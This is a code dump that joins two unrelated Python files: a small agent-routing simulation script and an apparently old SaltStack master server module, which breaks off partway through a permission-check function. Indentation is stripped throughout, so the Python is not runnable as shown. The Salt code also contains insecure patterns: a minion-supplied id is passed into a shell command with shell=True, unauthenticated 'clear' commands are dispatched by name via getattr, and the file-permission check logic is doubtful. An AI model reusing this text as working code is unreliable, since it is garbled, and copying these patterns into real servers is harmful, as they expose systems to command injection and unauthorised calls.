| source | python |
|---|---|
simulation.py
|
"""
@file simulation.py
@brief Quick test simulation to try out the agent/arena and rendering
@author Graham Riches
@details
"""
import threading
from core.render_engine import Renderer
from core.command_line import CommandLine
from routing.a_star import AStar
from routing.managers.sequential import Sequential
from core.agent import *
from core.arena import Arena
BASE_TIME_STEP = 0.05
BASE_DPI = 40
# CLI thread
def cli_thread_func(arena: Arena, agents: list) -> None:
cli = CommandLine(arena, agents)
while True:
cli.get_input()
# setup an arena
sim_arena = Arena(40, 40)
# create some agents and add them to the agents list
sim_agent = Agent(0, 0, BASE_TIME_STEP)
sim_agent_1 = Agent(5, 5, BASE_TIME_STEP)
sim_agent_1.set_kinematic_parameters(4, 4, 4)
sim_agent.set_kinematic_parameters(6, 6, 6)
sim_agents = list()
sim_agents.append(sim_agent)
sim_agents.append(sim_agent_1)
# setup the routing algorithm
algorithm = AStar(sim_arena, sim_agents)
algorithm.turn_factor = 2
# create the pathing algorithm
routing_manager = Sequential(sim_arena, sim_agents, algorithm)
# setup the renderer
renderer = Renderer(sim_arena, sim_agents, routing_manager, BASE_TIME_STEP, BASE_DPI)
# start the CLI thread
cli_thread = threading.Thread(target=cli_thread_func, args=(sim_arena, sim_agents))
cli_thread.start()
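# Main simulation loop: render the arena, advance the routing manager by one
# time step, then draw each agent and refresh the display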
while True:
renderer.render_arena()
routing_manager.run_time_step()
for agent_id, agent in enumerate(sim_agents):
renderer.render_agent(agent_id)
renderer.update()
|
master.py
|
'''
This module contains all of the routines needed to set up a master server.
This involves preparing the three listeners and the workers needed by the master.
'''
# Import python libs
import os
import re
import time
import errno
import fnmatch
import signal
import shutil
import stat
import logging
import hashlib
import datetime
import pwd
import getpass
import resource
import subprocess
import multiprocessing
# Import third party libs
import zmq
import yaml
from M2Crypto import RSA
# Import salt libs
import salt.crypt
import salt.utils
import salt.client
import salt.payload
import salt.pillar
import salt.state
import salt.runner
import salt.auth
import salt.wheel
import salt.minion
import salt.search
import salt.utils
import salt.utils.atomicfile
import salt.utils.event
import salt.utils.verify
import salt.utils.minions
import salt.utils.gzip_util
from salt.utils.debug import enable_sigusr1_handler
log = logging.getLogger(__name__)
def clean_proc(proc, wait_for_kill=10):
'''
Generic method for cleaning up multiprocessing procs
'''
# NoneType and other fun stuff need not apply
if not proc:
return
try:
waited = 0
while proc.is_alive():
proc.terminate()
waited += 1
time.sleep(0.1)
if proc.is_alive() and (waited >= wait_for_kill):
log.error(('Process did not die with terminate(): {0}'
.format(proc.pid)))
os.kill(proc.pid, signal.SIGKILL)
except (AssertionError, AttributeError):
# Catch AssertionError when the proc is evaluated inside the child
# Catch AttributeError when the process dies between proc.is_alive()
# and proc.terminate() and turns into a NoneType
pass
class MasterExit(SystemExit):
'''
Named exit exception for the master process exiting
'''
pass
class SMaster(object):
'''
Create a simple salt-master; this will generate the top-level master
'''
def __init__(self, opts):
'''
Create a salt master server instance
'''
self.opts = opts
self.master_key = salt.crypt.MasterKeys(self.opts)
self.key = self.__prep_key()
self.crypticle = self.__prep_crypticle()
def __prep_crypticle(self):
'''
Return the crypticle used for AES
'''
return salt.crypt.Crypticle(self.opts, self.opts['aes'])
def __prep_key(self):
'''
A key needs to be placed in the filesystem with permissions 0400 so
clients are required to run as root (or as the key's owner) to read it.
'''
users = []
keys = {}
acl_users = set(self.opts['client_acl'].keys())
if self.opts.get('user'):
acl_users.add(self.opts['user'])
acl_users.add(getpass.getuser())
for user in pwd.getpwall():
users.append(user.pw_name)
for user in acl_users:
log.info(
'Preparing the {0} key for local communication'.format(
user
)
)
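# 191 == 0o277: create the key file without group/other permission bits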
cumask = os.umask(191)
if not user in users:
log.error('ACL user {0} is not available'.format(user))
continue
keyfile = os.path.join(
self.opts['cachedir'], '.{0}_key'.format(user)
)
if os.path.exists(keyfile):
log.debug('Removing stale keyfile: {0}'.format(keyfile))
os.unlink(keyfile)
key = salt.crypt.Crypticle.generate_key_string()
with salt.utils.fopen(keyfile, 'w+') as fp_:
fp_.write(key)
os.umask(cumask)
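# 256 == 0o400: the key file is readable only by its owner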
os.chmod(keyfile, 256)
try:
os.chown(keyfile, pwd.getpwnam(user).pw_uid, -1)
except OSError:
# The master is not being run as root and can therefore not
# chown the key file
pass
keys[user] = key
return keys
class Master(SMaster):
'''
The salt master server
'''
def __init__(self, opts):
'''
Create a salt master server instance
'''
SMaster.__init__(self, opts)
def _clear_old_jobs(self):
'''
Clean out the old jobs
'''
jid_root = os.path.join(self.opts['cachedir'], 'jobs')
search = salt.search.Search(self.opts)
last = time.time()
while True:
if self.opts['keep_jobs'] != 0:
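# A jid begins with a YYYYmmddHH timestamp; its first ten digits are compared below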
cur = "{0:%Y%m%d%H}".format(datetime.datetime.now())
for top in os.listdir(jid_root):
t_path = os.path.join(jid_root, top)
for final in os.listdir(t_path):
f_path = os.path.join(t_path, final)
jid_file = os.path.join(f_path, 'jid')
if not os.path.isfile(jid_file):
continue
with salt.utils.fopen(jid_file, 'r') as fn_:
jid = fn_.read()
if len(jid) < 18:
# Invalid jid, scrub the dir
shutil.rmtree(f_path)
elif int(cur) - int(jid[:10]) > self.opts['keep_jobs']:
shutil.rmtree(f_path)
if self.opts.get('search'):
now = time.time()
if now - last > self.opts['search_index_interval']:
search.index()
try:
time.sleep(60)
except KeyboardInterrupt:
break
def __set_max_open_files(self):
# Let's check to see what our max open files (ulimit -n) setting is
mof_s, mof_h = resource.getrlimit(resource.RLIMIT_NOFILE)
log.info(
'Current values for max open files soft/hard setting: '
'{0}/{1}'.format(
mof_s, mof_h
)
)
# Let's grab, from the configuration file, the value to raise max open
# files to
mof_c = self.opts['max_open_files']
if mof_c > mof_h:
# The configured value is higher than what's allowed
log.warning(
'The value for the \'max_open_files\' setting, {0}, is higher '
'than what the user running salt is allowed to raise to, {1}. '
'Defaulting to {1}.'.format(mof_c, mof_h)
)
mof_c = mof_h
if mof_s < mof_c:
# There's room to raise the value. Raise it!
log.warning('Raising max open files value to {0}'.format(mof_c))
resource.setrlimit(resource.RLIMIT_NOFILE, (mof_c, mof_h))
mof_s, mof_h = resource.getrlimit(resource.RLIMIT_NOFILE)
log.warning(
'New values for max open files soft/hard values: '
'{0}/{1}'.format(mof_s, mof_h)
)
def start(self):
'''
Turn on the master server components
'''
log.info(
'salt-master is starting as user \'{0}\''.format(getpass.getuser())
)
enable_sigusr1_handler()
self.__set_max_open_files()
clear_old_jobs_proc = multiprocessing.Process(
target=self._clear_old_jobs)
clear_old_jobs_proc.start()
reqserv = ReqServer(
self.opts,
self.crypticle,
self.key,
self.master_key)
reqserv.start_publisher()
reqserv.start_event_publisher()
reqserv.start_reactor()
def sigterm_clean(signum, frame):
'''
Cleaner method for stopping multiprocessing processes when a
SIGTERM is encountered. This is required when running a salt
master under a process minder like daemontools
'''
log.warn(('Caught signal {0}, stopping the Salt Master'
.format(signum)))
clean_proc(clear_old_jobs_proc)
clean_proc(reqserv.publisher)
clean_proc(reqserv.eventpublisher)
for proc in reqserv.work_procs:
clean_proc(proc)
raise MasterExit
signal.signal(signal.SIGTERM, sigterm_clean)
try:
reqserv.run()
except KeyboardInterrupt:
# Shut the master down gracefully on SIGINT
log.warn('Stopping the Salt Master')
raise SystemExit('\nExiting on Ctrl-c')
class Publisher(multiprocessing.Process):
'''
The publishing interface, a simple zeromq publisher that sends out the
commands.
'''
def __init__(self, opts):
super(Publisher, self).__init__()
self.opts = opts
def run(self):
'''
Bind to the interface specified in the configuration file
'''
# Set up the context
context = zmq.Context(1)
# Prepare minion publish socket
pub_sock = context.socket(zmq.PUB)
# if 2.1 <= zmq < 3.0, we only have one HWM setting
try:
pub_sock.setsockopt(zmq.HWM, 1)
# in zmq >= 3.0, there are separate send and receive HWM settings
except AttributeError:
pub_sock.setsockopt(zmq.SNDHWM, 1)
pub_sock.setsockopt(zmq.RCVHWM, 1)
pub_uri = 'tcp://{interface}:{publish_port}'.format(**self.opts)
# Prepare minion pull socket
pull_sock = context.socket(zmq.PULL)
pull_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'publish_pull.ipc')
)
# Start the minion command publisher
log.info('Starting the Salt Publisher on {0}'.format(pub_uri))
pub_sock.bind(pub_uri)
pull_sock.bind(pull_uri)
# Restrict access to the socket (448 == 0o700: owner-only)
os.chmod(
os.path.join(self.opts['sock_dir'],
'publish_pull.ipc'),
448
)
try:
while True:
# Catch and handle EINTR from when this process is sent
# SIGUSR1 gracefully so we don't choke and die horribly
try:
package = pull_sock.recv()
pub_sock.send(package)
except zmq.ZMQError as exc:
if exc.errno == errno.EINTR:
continue
raise exc
except KeyboardInterrupt:
pub_sock.setsockopt(zmq.LINGER, 2500)
pub_sock.close()
pull_sock.setsockopt(zmq.LINGER, 2500)
pull_sock.close()
finally:
context.term()
class ReqServer(object):
'''
Starts up the master request server, minions send results to this
interface.
'''
def __init__(self, opts, crypticle, key, mkey):
self.opts = opts
self.master_key = mkey
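# One zmq io thread per configured worker process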
self.context = zmq.Context(self.opts['worker_threads'])
# Prepare the zeromq sockets
self.uri = 'tcp://{interface}:{ret_port}'.format(**self.opts)
self.clients = self.context.socket(zmq.ROUTER)
self.workers = self.context.socket(zmq.DEALER)
self.w_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'workers.ipc')
)
# Prepare the AES key
self.key = key
self.crypticle = crypticle
def __bind(self):
'''
Binds the reply server
'''
log.info('Setting up the master communication server')
self.clients.bind(self.uri)
self.work_procs = []
for ind in range(int(self.opts['worker_threads'])):
self.work_procs.append(MWorker(self.opts,
self.master_key,
self.key,
self.crypticle))
for ind, proc in enumerate(self.work_procs):
log.info('Starting Salt worker process {0}'.format(ind))
proc.start()
self.workers.bind(self.w_uri)
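# Forward messages between the client-facing ROUTER socket and the worker
# DEALER socket, restarting the device if interrupted by a signal (EINTR)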
while True:
try:
zmq.device(zmq.QUEUE, self.clients, self.workers)
except zmq.ZMQError as exc:
if exc.errno == errno.EINTR:
continue
raise exc
def start_publisher(self):
'''
Start the salt publisher interface
'''
# Start the publisher
self.publisher = Publisher(self.opts)
self.publisher.start()
def start_event_publisher(self):
'''
Start the salt event publisher interface
'''
# Start the event publisher
self.eventpublisher = salt.utils.event.EventPublisher(self.opts)
self.eventpublisher.start()
def start_reactor(self):
'''
Start the reactor, but only if the reactor interface is configured
'''
if self.opts.get('reactor'):
self.reactor = salt.utils.event.Reactor(self.opts)
self.reactor.start()
def run(self):
'''
Start up the ReqServer
'''
self.__bind()
def destroy(self):
self.clients.setsockopt(zmq.LINGER, 2500)
self.clients.close()
self.workers.setsockopt(zmq.LINGER, 2500)
self.workers.close()
self.context.term()
def __del__(self):
self.destroy()
class MWorker(multiprocessing.Process):
'''
The worker multiprocess instance to manage the backend operations for the
salt master.
'''
def __init__(self,
opts,
mkey,
key,
crypticle):
multiprocessing.Process.__init__(self)
self.opts = opts
self.serial = salt.payload.Serial(opts)
self.crypticle = crypticle
self.mkey = mkey
self.key = key
def __bind(self):
'''
Bind to the local port
'''
context = zmq.Context(1)
socket = context.socket(zmq.REP)
w_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'workers.ipc')
)
log.info('Worker binding to socket {0}'.format(w_uri))
try:
socket.connect(w_uri)
while True:
try:
package = socket.recv()
payload = self.serial.loads(package)
ret = self.serial.dumps(self._handle_payload(payload))
socket.send(ret)
# Properly handle EINTR from SIGUSR1
except zmq.ZMQError as exc:
if exc.errno == errno.EINTR:
continue
raise exc
except KeyboardInterrupt:
socket.setsockopt(zmq.LINGER, 2500)
socket.close()
finally:
context.term()
def _handle_payload(self, payload):
'''
The _handle_payload method is the key method used to figure out what
needs to be done with communication to the server
'''
try:
key = payload['enc']
load = payload['load']
except KeyError:
return ''
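# Dispatch on the 'enc' field: AES-encrypted, pubkey, or cleartext payloads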
return {'aes': self._handle_aes,
'pub': self._handle_pub,
'clear': self._handle_clear}[key](load)
def _handle_clear(self, load):
'''
Take care of a cleartext command
'''
log.info('Clear payload received with command {cmd}'.format(**load))
return getattr(self.clear_funcs, load['cmd'])(load)
def _handle_pub(self, load):
'''
Handle a command sent via a public key pair
'''
log.info('Pubkey payload received with command {cmd}'.format(**load))
def _handle_aes(self, load):
'''
Handle a command sent via an aes key
'''
try:
data = self.crypticle.loads(load)
except Exception:
return ''
if 'cmd' not in data:
log.error('Received malformed command {0}'.format(data))
return {}
log.info('AES payload received with command {0}'.format(data['cmd']))
return self.aes_funcs.run_func(data['cmd'], data)
def run(self):
'''
Start a Master Worker
'''
self.clear_funcs = ClearFuncs(
self.opts,
self.key,
self.mkey,
self.crypticle)
self.aes_funcs = AESFuncs(self.opts, self.crypticle)
self.__bind()
class AESFuncs(object):
'''
Set up functions that are available when the load is encrypted with AES
'''
# The AES Functions:
#
def __init__(self, opts, crypticle):
self.opts = opts
self.event = salt.utils.event.MasterEvent(self.opts['sock_dir'])
self.serial = salt.payload.Serial(opts)
self.crypticle = crypticle
self.ckminions = salt.utils.minions.CkMinions(opts)
# Create the tops dict for loading external top data
self.tops = salt.loader.tops(self.opts)
# Make a client
self.local = salt.client.LocalClient(self.opts['conf_file'])
# Create the master minion to access the external job cache
self.mminion = salt.minion.MasterMinion(self.opts)
def __find_file(self, path, env='base'):
'''
Search the environment for the relative path
'''
fnd = {'path': '',
'rel': ''}
if os.path.isabs(path):
return fnd
if env not in self.opts['file_roots']:
return fnd
for root in self.opts['file_roots'][env]:
full = os.path.join(root, path)
if os.path.isfile(full) and not self.__is_file_ignored(full):
fnd['path'] = full
fnd['rel'] = path
return fnd
return fnd
def __verify_minion(self, id_, token):
'''
Take a minion id and a string signed with the minion private key
The string needs to verify as 'salt' with the minion public key
'''
pub_path = os.path.join(self.opts['pki_dir'], 'minions', id_)
with salt.utils.fopen(pub_path, 'r') as fp_:
minion_pub = fp_.read()
tmp_pub = salt.utils.mkstemp()
with salt.utils.fopen(tmp_pub, 'w+') as fp_:
fp_.write(minion_pub)
pub = None
try:
pub = RSA.load_pub_key(tmp_pub)
except RSA.RSAError as e:
log.error('Unable to load temporary public key "{0}": {1}'
.format(tmp_pub, e))
try:
os.remove(tmp_pub)
if pub.public_decrypt(token, 5) == 'salt':
return True
except RSA.RSAError as e:
log.error('Unable to decrypt token: {0}'.format(e))
log.error('Salt minion claiming to be {0} has attempted to '
'communicate with the master and could not be verified'
.format(id_))
return False
def __is_file_ignored(self, fn):
'''
If file_ignore_regex or file_ignore_glob were given in config,
compare the given file path against all of them and return True
on the first match.
'''
if self.opts['file_ignore_regex']:
for r in self.opts['file_ignore_regex']:
if re.search(r, fn):
log.debug('File matching file_ignore_regex. Skipping: {0}'.format(fn))
return True
if self.opts['file_ignore_glob']:
for g in self.opts['file_ignore_glob']:
if fnmatch.fnmatch(fn, g):
log.debug('File matching file_ignore_glob. Skipping: {0}'.format(fn))
return True
return False
def _ext_nodes(self, load):
'''
Return the results from an external node classifier if one is
specified
'''
if not 'id' in load:
log.error('Received call for external nodes without an id')
return {}
ret = {}
# The old ext_nodes method is set to be deprecated in 0.10.4
# and should be removed within 3-5 releases in favor of the
# "master_tops" system
if self.opts['external_nodes']:
if not salt.utils.which(self.opts['external_nodes']):
log.error(('Specified external nodes controller {0} is not'
' available, please verify that it is installed'
'').format(self.opts['external_nodes']))
return {}
cmd = '{0} {1}'.format(self.opts['external_nodes'], load['id'])
ndata = yaml.safe_load(
subprocess.Popen(
cmd,
shell=True,
stdout=subprocess.PIPE
).communicate()[0])
if 'environment' in ndata:
env = ndata['environment']
else:
env = 'base'
if 'classes' in ndata:
if isinstance(ndata['classes'], dict):
ret[env] = list(ndata['classes'])
elif isinstance(ndata['classes'], list):
ret[env] = ndata['classes']
else:
return ret
# Evaluate all configured master_tops interfaces
opts = {}
grains = {}
if 'opts' in load:
opts = load['opts']
if 'grains' in load['opts']:
grains = load['opts']['grains']
for fun in self.tops:
try:
ret.update(self.tops[fun](opts=opts, grains=grains))
except Exception as exc:
log.error(
('Top function {0} failed with error {1} for minion '
'{2}').format(fun, exc, load['id'])
)
# If anything happens in the top generation, log it and move on
pass
return ret
def _serve_file(self, load):
'''
Return a chunk from a file based on the data received
'''
ret = {'data': '',
'dest': ''}
if 'path' not in load or 'loc' not in load or 'env' not in load:
return ret
fnd = self.__find_file(load['path'], load['env'])
if not fnd['path']:
return ret
ret['dest'] = fnd['rel']
gzip = load.get('gzip', None)
with salt.utils.fopen(fnd['path'], 'rb') as fp_:
fp_.seek(load['loc'])
data = fp_.read(self.opts['file_buffer_size'])
#if not data:
# ret.update(self._file_hash(load))
if gzip and data:
data = salt.utils.gzip_util.compress(data, gzip)
ret['gzip'] = gzip
ret['data'] = data
return ret
def _file_hash(self, load):
'''
Return a file hash, the hash type is set in the master config file
'''
if 'path' not in load or 'env' not in load:
return ''
path = self.__find_file(load['path'], load['env'])['path']
if not path:
return {}
ret = {}
with salt.utils.fopen(path, 'rb') as fp_:
ret['hsum'] = getattr(hashlib, self.opts['hash_type'])(
fp_.read()).hexdigest()
ret['hash_type'] = self.opts['hash_type']
return ret
def _file_list(self, load):
'''
Return a list of all files on the file server in a specified
environment
'''
ret = []
if load['env'] not in self.opts['file_roots']:
return ret
for path in self.opts['file_roots'][load['env']]:
for root, dirs, files in os.walk(path, followlinks=True):
for fn in files:
rel_fn = os.path.relpath(
os.path.join(root, fn),
path
)
if not self.__is_file_ignored(rel_fn):
ret.append(rel_fn)
return ret
def _file_list_emptydirs(self, load):
'''
Return a list of all empty directories on the master
'''
ret = []
if load['env'] not in self.opts['file_roots']:
return ret
for path in self.opts['file_roots'][load['env']]:
for root, dirs, files in os.walk(path, followlinks=True):
if len(dirs) == 0 and len(files) == 0:
rel_fn = os.path.relpath(root, path)
if not self.__is_file_ignored(rel_fn):
ret.append(rel_fn)
return ret
def _dir_list(self, load):
'''
Return a list of all directories on the master
'''
ret = []
if load['env'] not in self.opts['file_roots']:
return ret
for path in self.opts['file_roots'][load['env']]:
for root, dirs, files in os.walk(path, followlinks=True):
ret.append(os.path.relpath(root, path))
return ret
def _master_opts(self, load):
'''
Return the master options to the minion
'''
return self.opts
def _pillar(self, load):
'''
Return the pillar data for the minion
'''
if 'id' not in load or 'grains' not in load or 'env' not in load:
return False
pillar = salt.pillar.Pillar(
self.opts,
load['grains'],
load['id'],
load['env'])
data = pillar.compile_pillar()
if self.opts.get('minion_data_cache', False):
cdir = os.path.join(self.opts['cachedir'], 'minions', load['id'])
if not os.path.isdir(cdir):
os.makedirs(cdir)
datap = os.path.join(cdir, 'data.p')
with salt.utils.fopen(datap, 'w+') as fp_:
fp_.write(
self.serial.dumps(
{'grains': load['grains'],
'pillar': data})
)
return data
def _master_state(self, load):
'''
Call the master to compile a master side highstate
'''
if 'opts' not in load or 'grains' not in load:
return False
return salt.state.master_compile(
self.opts,
load['opts'],
load['grains'],
load['opts']['id'],
load['opts']['environment'])
def _minion_event(self, load):
'''
Receive an event from the minion and fire it on the master event
interface
'''
if 'id' not in load or 'tag' not in load or 'data' not in load:
return False
tag = load['tag']
return self.event.fire_event(load, tag)
def _return(self, load):
'''
Handle the return data sent from the minions
'''
# If the return data is invalid, just ignore it
if 'return' not in load or 'jid' not in load or 'id' not in load:
return False
if load['jid'] == 'req':
# The minion is returning a standalone job, request a jobid
load['jid'] = salt.utils.prep_jid(
self.opts['cachedir'],
self.opts['hash_type'])
log.info('Got return from {id} for job {jid}'.format(**load))
self.event.fire_event(load, load['jid'])
if self.opts['master_ext_job_cache']:
fstr = '{0}.returner'.format(self.opts['master_ext_job_cache'])
self.mminion.returners[fstr](load)
return
if not self.opts['job_cache'] or self.opts.get('ext_job_cache'):
return
jid_dir = salt.utils.jid_dir(
load['jid'],
self.opts['cachedir'],
self.opts['hash_type']
)
if not os.path.isdir(jid_dir):
log.error(
'An inconsistency occurred, a job was received with a job id '
'that is not present on the master: {jid}'.format(**load)
)
return False
hn_dir = os.path.join(jid_dir, load['id'])
if not os.path.isdir(hn_dir):
os.makedirs(hn_dir)
# Otherwise the minion has already returned this jid and it should
# be dropped
else:
log.error(
('An extra return was detected from minion {0}, please'
' verify the minion, this could be a replay'
' attack').format(load['id'])
)
return False
self.serial.dump(
load['return'],
# Use atomic open here to avoid the file being read before it's
# completely written to. Refs #1935
salt.utils.atomicfile.atomic_open(
os.path.join(hn_dir, 'return.p'), 'w+'
)
)
if 'out' in load:
self.serial.dump(
load['out'],
# Use atomic open here to avoid the file being read before
# it's completely written to. Refs #1935
salt.utils.atomicfile.atomic_open(
os.path.join(hn_dir, 'out.p'), 'w+'
)
)
def _syndic_return(self, load):
'''
Receive a syndic minion return and format it to look like returns from
individual minions.
'''
# Verify the load
if 'return' not in load or 'jid' not in load or 'id' not in load:
return None
# set the write flag
jid_dir = salt.utils.jid_dir(
load['jid'],
self.opts['cachedir'],
self.opts['hash_type']
)
if not os.path.isdir(jid_dir):
log.error(
'An inconsistency occurred, a job was received with a job id '
'that is not present on the master: {jid}'.format(**load)
)
return False
wtag = os.path.join(jid_dir, 'wtag_{0}'.format(load['id']))
try:
with salt.utils.fopen(wtag, 'w+') as fp_:
fp_.write('')
except (IOError, OSError):
log.error(
('Failed to commit the write tag for the syndic return,'
' are permissions correct in the cache dir:'
' {0}?').format(self.opts['cachedir'])
)
return False
# Format individual return loads
self.event.fire_event({'syndic': load['return'].keys()}, load['jid'])
for key, item in load['return'].items():
ret = {'jid': load['jid'],
'id': key,
'return': item}
if 'out' in load:
ret['out'] = load['out']
self._return(ret)
if os.path.isfile(wtag):
os.remove(wtag)
def minion_runner(self, clear_load):
'''
Execute a runner from a minion, return the runner's function data
'''
if 'peer_run' not in self.opts:
return {}
if not isinstance(self.opts['peer_run'], dict):
return {}
if 'fun' not in clear_load\
or 'arg' not in clear_load\
or 'id' not in clear_load\
or 'tok' not in clear_load:
return {}
if not self.__verify_minion(clear_load['id'], clear_load['tok']):
# The minion is not who it says it is!
# We don't want to listen to it!
msg = 'Minion id {0} is not who it says it is!'.format(
clear_load['id'])
log.warn(msg)
return {}
perms = set()
for match in self.opts['peer_run']:
if re.match(match, clear_load['id']):
# This is the list of funcs/modules!
if isinstance(self.opts['peer_run'][match], list):
perms.update(self.opts['peer_run'][match])
good = False
for perm in perms:
if re.match(perm, clear_load['fun']):
good = True
if not good:
return {}
# Prepare the runner object
opts = {'fun': clear_load['fun'],
'arg': clear_load['arg'],
'doc': False,
'conf_file': self.opts['conf_file']}
opts.update(self.opts)
runner = salt.runner.Runner(opts)
return runner.run()
def minion_publish(self, clear_load):
'''
Publish a command initiated from a minion, this method executes minion
restrictions so that the minion publication will only work if it is
enabled in the config.
The configuration on the master allows minions to be matched to
salt functions, so the minions can only publish allowed salt functions
The config will look like this:
peer:
.*:
- .*
This configuration will enable all minions to execute all commands.
peer:
foo.example.com:
- test.*
This configuration will only allow the minion foo.example.com to
execute commands from the test module
'''
# Verify that the load is valid
if 'peer' not in self.opts:
return {}
if not isinstance(self.opts['peer'], dict):
return {}
if 'fun' not in clear_load\
or 'arg' not in clear_load\
or 'tgt' not in clear_load\
or 'ret' not in clear_load\
or 'tok' not in clear_load\
or 'id' not in clear_load:
return {}
# If the command will make a recursive publish don't run
if re.match('publish.*', clear_load['fun']):
return {}
# Check the permissions for this minion
if not self.__verify_minion(clear_load['id'], clear_load['tok']):
# The minion is not who it says it is!
# We don't want to listen to it!
msg = 'Minion id {0} is not who it says it is!'.format(
clear_load['id'])
log.warn(msg)
return {}
perms = []
for match in self.opts['peer']:
if re.match(match, clear_load['id']):
# This is the list of funcs/modules!
if isinstance(self.opts['peer'][match], list):
perms.extend(self.opts['peer'][match])
if ',' in clear_load['fun']:
# 'arg': [['cat', '/proc/cpuinfo'], [], ['foo']]
clear_load['fun'] = clear_load['fun'].split(',')
arg_ = []
for arg in clear_load['arg']:
arg_.append(arg.split())
clear_load['arg'] = arg_
good = self.ckminions.auth_check(
perms,
clear_load['fun'],
clear_load['tgt'],
clear_load.get('tgt_type', 'glob'))
if not good:
return {}
# Set up the publication payload
jid = salt.utils.prep_jid(
self.opts['cachedir'],
self.opts['hash_type']
)
load = {
'fun': clear_load['fun'],
'arg': clear_load['arg'],
'tgt_type': clear_load.get('tgt_type', 'glob'),
'tgt': clear_load['tgt'],
'jid': jid,
'ret': clear_load['ret'],
'id': clear_load['id'],
}
self.serial.dump(
load, salt.utils.fopen(
os.path.join(
salt.utils.jid_dir(
jid,
self.opts['cachedir'],
self.opts['hash_type']
),
'.load.p'
),
'w+')
)
# Save the load to the ext_job_cache if it is turned on
if self.opts['ext_job_cache']:
try:
fstr = '{0}.save_load'.format(self.opts['ext_job_cache'])
self.mminion.returners[fstr](clear_load['jid'], clear_load)
except KeyError:
msg = ('The specified returner used for the external job '
'cache "{0}" does not have a save_load function!'
).format(self.opts['ext_job_cache'])
log.critical(msg)
payload = {'enc': 'aes'}
expr_form = 'glob'
timeout = 5
if 'tmo' in clear_load:
try:
timeout = int(clear_load['tmo'])
except ValueError:
msg = 'Failed to parse timeout value: {0}'.format(
clear_load['tmo'])
log.warn(msg)
return {}
if 'tgt_type' in clear_load:
load['tgt_type'] = clear_load['tgt_type']
expr_form = load['tgt_type']
if 'timeout' in clear_load:
timeout = clear_load['timeout']
# Encrypt!
payload['load'] = self.crypticle.dumps(load)
# Connect to the publisher
context = zmq.Context(1)
pub_sock = context.socket(zmq.PUSH)
pull_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'publish_pull.ipc')
)
pub_sock.connect(pull_uri)
log.info(('Publishing minion job: #{jid}, func: "{fun}", args:'
' "{arg}", target: "{tgt}"').format(**load))
pub_sock.send(self.serial.dumps(payload))
# Run the client get_returns method based on the form data sent
if 'form' in clear_load:
ret_form = clear_load['form']
else:
ret_form = 'clean'
if ret_form == 'clean':
try:
return self.local.get_returns(
jid,
self.ckminions.check_minions(
clear_load['tgt'],
expr_form
),
timeout
)
finally:
pub_sock.setsockopt(zmq.LINGER, 2500)
pub_sock.close()
context.term()
elif ret_form == 'full':
ret = self.local.get_full_returns(
jid,
self.ckminions.check_minions(
clear_load['tgt'],
expr_form
),
timeout
)
ret['__jid__'] = jid
try:
return ret
finally:
pub_sock.setsockopt(zmq.LINGER, 2500)
pub_sock.close()
context.term()
def run_func(self, func, load):
'''
Wrapper for running functions executed with AES encryption
'''
# Don't honor private functions
if func.startswith('__'):
return self.crypticle.dumps({})
# Run the func
if hasattr(self, func):
ret = getattr(self, func)(load)
else:
log.error(('Received function {0} which is unavailable on the '
'master, returning False').format(func))
return self.crypticle.dumps(False)
# Don't encrypt the return value for the _return func
# (we don't care about the return value, so why encrypt it?)
if func == '_return':
return ret
if func == '_pillar' and 'id' in load:
if not load.get('ver') == '2' and self.opts['pillar_version'] == 1:
# Authorized to return old pillar proto
return self.crypticle.dumps(ret)
# encrypt with a specific aes key
pubfn = os.path.join(self.opts['pki_dir'],
'minions',
load['id'])
key = salt.crypt.Crypticle.generate_key_string()
pcrypt = salt.crypt.Crypticle(
self.opts,
key)
try:
pub = RSA.load_pub_key(pubfn)
except RSA.RSAError:
return self.crypticle.dumps({})
pret = {}
pret['key'] = pub.public_encrypt(key, 4)
pret['pillar'] = pcrypt.dumps(ret)
return pret
# AES Encrypt the return
return self.crypticle.dumps(ret)
class ClearFuncs(object):
'''
Set up functions that are safe to execute when commands are sent to the master
without encryption or authentication
'''
# The ClearFuncs object encapsulates the functions that can be executed in
# the clear:
# publish (The publish from the LocalClient)
# _auth
def __init__(self, opts, key, master_key, crypticle):
self.opts = opts
self.serial = salt.payload.Serial(opts)
self.key = key
self.master_key = master_key
self.crypticle = crypticle
# Create the event manager
self.event = salt.utils.event.MasterEvent(self.opts['sock_dir'])
# Make a client
self.local = salt.client.LocalClient(self.opts['conf_file'])
# Make an minion checker object
self.ckminions = salt.utils.minions.CkMinions(opts)
# Make an Auth object
self.loadauth = salt.auth.LoadAuth(opts)
# Stand up the master Minion to access returner data
self.mminion = salt.minion.MasterMinion(self.opts)
# Make a wheel object
self.wheel_ = salt.wheel.Wheel(opts)
def _send_cluster(self):
'''
Send the cluster data out
'''
log.debug('Sending out cluster data')
ret = self.local.cmd(self.opts['cluster_masters'],
'cluster.distrib',
self._cluster_load(),
0,
'list'
)
log.debug('Cluster distributed: {0}'.format(ret))
def _cluster_load(self):
'''
Generates the data sent to the cluster nodes.
'''
minions = {}
master_pem = ''
with salt.utils.fopen(self.opts['conf_file'], 'r') as fp_:
master_conf = fp_.read()
minion_dir = os.path.join(self.opts['pki_dir'], 'minions')
for host in os.listdir(minion_dir):
pub = os.path.join(minion_dir, host)
minions[host] = salt.utils.fopen(pub, 'r').read()
if self.opts['cluster_mode'] == 'full':
master_pem_path = os.path.join(self.opts['pki_dir'], 'master.pem')
with salt.utils.fopen(master_pem_path) as fp_:
master_pem = fp_.read()
return [minions,
master_conf,
master_pem,
self.opts['conf_file']]
def _check_permissions(self, filename):
'''
check if the specified filename has correct permissions
'''
if 'os' in os.environ:
if os.environ['os'].startswith('Windows'):
return True
import pwd # after confirming not running Windows
import grp
try:
user = self.opts['user']
pwnam = pwd.getpwnam(user)
uid = pwnam[2]
gid = pwnam[3]
groups = [g.gr_gid for g in grp.getgrall() if user in g.gr_mem]
except KeyError:
err = ('Failed to determine groups for user '
'{0}. The user is not available.\n').format(user)
log.error(err)
return False
fmode = os.stat(filename)
if os.getuid() == 0:
if fmode.st_uid == uid or not fmode.st_gid == gid:
return True
elif self.opts.get('permissive_pki_access', False) \
and fmode.st_gid in groups:
return True
else:
if stat.S_IWOTH & fmode.st_mode:
# don't allow others to write to the file
return False
# check group flags
if self.opts.get('permissive_pki_access', False) \
and stat.S_IWGRP & fmode.st_mode:
return True
elif stat.S_IWGRP & fmode.st_mode:
return False
# check if writable by group or other
